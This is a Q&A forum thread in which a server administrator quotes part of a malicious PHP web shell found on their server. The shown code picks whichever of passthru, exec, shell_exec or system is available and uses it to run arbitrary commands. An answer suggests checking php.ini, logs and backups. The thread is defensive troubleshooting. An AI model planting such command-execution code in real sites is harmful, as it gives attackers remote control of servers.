I had one problem on my server today and I discovered malicious code which is used to gain access to my system for attacker.
I have downloaded that php script, but what was weird is that I saw functions which are disabled in my php configuration.
Disabled are: passthru,exec,shell_exec,system…. among others
How is that possible?
This is part of code
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}
elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."<br>";
}
}
elseif($method == "shell_exec")
{
print shell_exec($command);
}
elseif($method == "system")
{
system($command);
}
}
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
Just to be sure that there are no left overs, I have copied that script to new account which no one has access to except me. There is no htaccess file or php.ini. Script still works on that account. I have created phpinfo file to see php configuration for that file and here are disabled functions.
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
As you can see, listed functions which are used in that script are inside disabled functions.
When I try to run some of disabled functions I get message
Warning: system() has been disabled for security reasons in /home/user....
Just to make sure, I have uploaded that script to different server and same was possible. That server also has same disabled functions.
How can I prevent this from allowing someone access to my files?
Best Answer
Probably you are looking in the wrong php.ini. Confirm that the functions are disabled by creating a test.php containing the following in the same folder the malicious code was and navigate to it. Check out disable_functions and confirm they are.
Most apache installations on linux support many ways of executing php code, check out disable_functions on all you system wide php.ini with this:
Also check out any php.ini and .htaccess in your /var/www.
Check out vhosts logs, apache logs, system logs.
Depending on the level of your system's compromise you may even be unable to see the actual configuration files in production for your services.
Edit: After reading your further comments I must suppose that your system is deeply compromised and you should (or, in your place, I would) quit wasting time and reinstall system / restore from backups. Please take seriously in account that many files on your sites are probably compromised too. Restore from backups don't take files from compromised system to new production env.